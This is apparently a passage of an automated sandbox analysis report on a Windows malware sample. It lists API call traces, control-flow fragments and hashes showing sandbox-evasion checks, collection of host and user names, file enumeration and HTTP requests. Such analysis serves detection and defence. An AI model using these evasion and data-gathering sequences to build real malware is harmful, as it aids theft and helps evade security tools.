22d0824-22d0833 1393->1397 1398 22d07d7-22d07e0 1393->1398 1399 22d054d-22d0550 1394->1399 1395->1380 1400 22d0660-22d066a 1395->1400 1401 22d08fb-22d0901 1396->1401 1402 22d0902-22d091d 1396->1402 1408 22d0839-22d083c 1397->1408 1403 22d07e4-22d0822 1398->1403 1404 22d07e2 1398->1404 1405 22d0556-22d056b 1399->1405 1406 22d05e0-22d05ef 1399->1406 1407 22d067a-22d0689 1400->1407 1401->1402 1403->1393 1404->1397 1409 22d056d 1405->1409 1410 22d056f-22d057a 1405->1410 1406->1379 1411 22d068f-22d06b2 1407->1411 1412 22d0750-22d077a 1407->1412 1408->1388 1413 22d083e-22d0847 1408->1413 1409->1406 1415 22d057c-22d0599 1410->1415 1416 22d059b-22d05bb 1410->1416 1417 22d06ef-22d06fc 1411->1417 1418 22d06b4-22d06ed 1411->1418 1412->1392 1419 22d0849 1413->1419 1420 22d084b-22d086c 1413->1420 1427 22d05bd-22d05db 1415->1427 1416->1427 1421 22d06fe-22d0748 1417->1421 1422 22d074b 1417->1422 1418->1417 1419->1388 1420->1408 1421->1422 1422->1407 1427->1399
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022D024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 843d15250191d38fba398d3ca70026578c5ac18b496f9cfb788fbf15331d557a
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 9D525C74A11229DFDB64CF98C984BACBBB1BF09314F1480D9E54DAB365DB30AA85CF14

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BB40), ref: 004198A1
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BB28), ref: 004198BA
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BA98), ref: 004198D2
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BAB0), ref: 004198EA
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BE10), ref: 00419903
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00946040), ref: 0041991B
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00944940), ref: 00419933
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00944980), ref: 0041994C
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BD68), ref: 00419964
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BCF0), ref: 0041997C
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BE88), ref: 00419995
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BE58), ref: 004199AD
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00944900), ref: 004199C5
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0094BD98), ref: 004199DE
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                            • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                            • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                            • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                            • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                            • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                            • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                            • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                            • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                          • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                            • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                            • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                            • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00946070,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                          • Sleep.KERNEL32(00001770), ref: 00416B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00946070,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                          • ExitProcess.KERNEL32 ref: 00416B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                          • String ID:
                                          • API String ID: 3511611419-0
                                          • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                          • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                          • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                          • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                          Control-flow Graph

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                          • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ??2@$CrackInternetlstrlen
                                          • String ID: <
                                          • API String ID: 1683549937-4251816714
                                          • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                          • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                          • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                          • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                          • __aulldiv.LIBCMT ref: 00401258
                                          • __aulldiv.LIBCMT ref: 00401266
                                          • ExitProcess.KERNEL32 ref: 00401294
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                          • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00946070,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                          • Sleep.KERNEL32(00001770), ref: 00416B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00946070,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                          • ExitProcess.KERNEL32 ref: 00416B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                          • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                          • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                          • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00978648), ref: 00406303
                                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0097C5F8,00000000,00000000,00400100,00000000), ref: 00406385
                                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                          • String ID: ERROR$ERROR
                                          • API String ID: 3287882509-2579291623
                                          • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                          • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                          • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                          • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocComputerNameProcess
                                          • String ID:
                                          • API String ID: 4203777966-0
                                          • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                          • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                          • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                          • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                          • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                          • ExitProcess.KERNEL32 ref: 00401143
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                          • String ID:
                                          • API String ID: 1103761159-0
                                          • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                          • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                          • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                          • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0094ED16
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0094ED36
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_94d000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: c3e2ee7e2ce33079421378919150be72f9c08ab7c795a11d6f2f159c922cf786
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: 48F09635A007156BD7203BF5988DFAEB6ECBF49728F140528E646D10C0DB70EC458A61
                                          APIs
                                          • SetErrorMode.KERNEL32(00000400,?,?,022D0223,?,?), ref: 022D0E19
                                          • SetErrorMode.KERNEL32(00000000,?,?,022D0223,?,?), ref: 022D0E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: 50aa6c00ba5b177b5bbeec93bfda0059b8d1f6a57755c1eca6658fe1f3340d39
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: FED0123115512877D7002AE4DC09BCD7B1CDF09B66F008011FB0DD9080C770964046E5
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                          • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                          • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                          • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                          APIs
                                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                            • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                            • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                          • ExitProcess.KERNEL32 ref: 004011C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocName$ComputerExitUser
                                          • String ID:
                                          • API String ID: 1004333139-0
                                          • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                          • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                          • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                          • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0094E9FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_94d000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 9be7ab2df4805ba8416711cd8b4811baaff344d55930993128a2a72d0c616046
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 4E110C79A00208EFDB01DF98C985E99BBF5BF08751F158094F9489B362D771EA50DF90
                                          APIs
                                          • wsprintfA.USER32 ref: 004138CC
                                          • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                          • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                          • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                          • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                          • API String ID: 1125553467-817767981
                                          • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                          • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                          • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                          • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
